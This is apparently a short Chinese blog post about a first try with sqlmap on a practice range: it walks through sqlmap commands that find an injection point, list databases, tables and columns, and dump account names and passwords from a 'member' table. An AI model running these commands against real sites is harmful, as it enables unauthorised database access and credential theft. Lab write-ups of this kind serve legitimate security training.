sqlmap| 初次体验（使用说明+实践）

本次sqlmap使用环境为墨者学院靶场------>墨者学院靶场

这关主要是在不知道用户名和密码的情况下利用sql盲注跑出账号和密码。手工注入这里就不说了，主要讲一下这次使用sqlmap的体验。

假如小伙伴像我一样刚使用sqlmap建议先看一下这篇文章，写的蛮详细。------>sqlmap使用教程

点击下方的维护公告可以发现这个页面有一个明显的注入点，我们用sqlmap测试一下

python sqlmap.py -u "url"

这个id是一个注入点 sqlmap也给出了playload。

接着我们继续跑出他的数据库：

python sqlmap.py -u "url" --dbs

跑出来五个数据库，这里我们并没有看到任何提示，只能一个一个的试，试到stormgroup时发现这个库里有东西。

继续跑出他里的表：-D stormgroup --tables

继续跑：-T member --colums

还跑：-D stormgroup -T member -C name,password,status --dump

账号密码就在这里了。第一个被禁用了，密码是第二个！

语句还是要多练习。